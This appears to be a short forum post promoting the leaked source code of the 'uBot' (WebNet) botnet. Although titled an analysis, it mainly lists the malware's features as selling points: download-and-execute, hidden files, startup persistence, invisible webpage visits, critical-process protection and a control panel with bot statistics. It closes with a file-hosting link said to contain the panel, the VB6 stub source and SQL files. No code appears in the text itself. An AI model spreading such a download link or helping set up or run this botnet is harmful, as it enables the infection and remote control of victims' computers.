µBot Botnet source and analysis

I'm sure many people reading this have heard of the malware with the name of "uBot". The source of this botnet was released earlier this year, It was originally named "WebNet". This botnet has a very small stub size of only 9KB compressed, and about 36KB un-compressed.

The features include;

INSTANT Infection, no waiting.
– Download & Execute.
– Update.
– Visit Webpage [Visible].
– Visit Webpage [Invisible].
– Uninstall.
– Add to Startup.
– Critical Process.
– Hidden File.
– Admin detection.
– Mutex.
– Coded in VB6, no .NET Framework dependency!
– Small, ~10kb compressed, 36kb uncompressed.
– Great stability.

Panel:
– Detailed statistics.
– Location plot, map graph.
– Pie Charts [Bot Status, Operating System, Admin].
– Tool-tip for last commands sent for each client.
– Bot selection preferences.
– Integrated Ajax, means everything is realtime! From client list to bot count.

On top of the extremely small stub size, its coded in vb6, so there is no .net dependancies, and the botnet panel is almost or as simple as the betabot 1.7.0.1 panel . This was a very stable botnet in its time, but I'm not sure how stable it is now that it has been leaked and malware researchers have taken a look at it. The main per pose for this botnet was for stability and for easy use.

Heres the downloads.

http://www.mediafire.com/download/vkqg2zgwonr78l9/uBot_Sauce.rar
that download includes the panel + vb6 stub source, and the sql files.